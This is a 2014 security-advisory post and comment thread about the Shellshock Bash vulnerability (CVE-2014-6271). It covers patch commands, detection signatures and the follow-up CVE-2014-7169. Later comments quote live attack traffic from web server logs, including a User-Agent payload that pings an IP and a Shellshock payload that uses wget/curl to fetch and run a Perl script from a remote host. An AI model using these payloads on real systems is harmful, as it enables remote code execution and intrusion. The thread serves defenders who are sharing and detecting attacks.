Over the past years, we became used to Microsoft Patches, the important, critical ones that would render your system fully vulnerable if you didn't apply them. We probably became so used that sometime we forget that our Linux servers also need patches. Today I've learned about a critical Bash patch, that addresses the CVE-2014-6271. According the advisory: "A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue." The patches are already ready for most of the Linux distros, like RedHat and Debian, so waste no time. --- Pedro Bueno (pbueno /%%/ isc. sans. org) |
Pedro 155 Posts ISC Handler Sep 24th 2014 |
Thread locked Subscribe |
Sep 24th 2014 7 years ago |
The good news is that it's an easy fix:
Debian (Ubuntu, etc.): apt-get upgrade bash RHEL (Fedora, CentOS, etc.): yum update bash |
da1212 69 Posts |
Quote |
Sep 24th 2014 7 years ago |
We've created the first batch of Sagan (log analysis engine - http://sagan.io) signatures to detect this. This monitor bash history and Apache logs for attempts. More information can be found at:
https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4 Apache: alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;) Bash: alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;) |
da1212 9 Posts |
Quote |
Sep 24th 2014 7 years ago |
Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
https://access.redhat.com/articles/1200223 |
Anonymous |
Quote |
Sep 25th 2014 7 years ago |
Red Hat provided an update indicating the patches are not complete and a new CVE has been assigned (CVE-2014-7169); more here:
https://access.redhat.com/articles/1200223 |
Anonymous |
Quote |
Sep 25th 2014 7 years ago |
We've just started seeing scanning traffic using the following packet contents:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138 Accept: */* This also appears to be using spoofed source IP's. No logs at this time. |
sludge3000 1 Posts |
Quote |
Sep 25th 2014 7 years ago |
You can't spoof a TCP payload. I've seen the above attacks from 89.207.135.125 which is (to me), obviously a host for malware sites and this sort of activity.
It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by). |
Steven C. 171 Posts |
Quote |
Sep 25th 2014 7 years ago |
Examples from my webserver log:
89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" 109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\"" Shouldn't this rate setting the Threat Level to at least chartreuse? |
John Hardin 62 Posts |
Quote |
Sep 25th 2014 7 years ago |
Sign Up for Free or Log In to start participating in the conversation!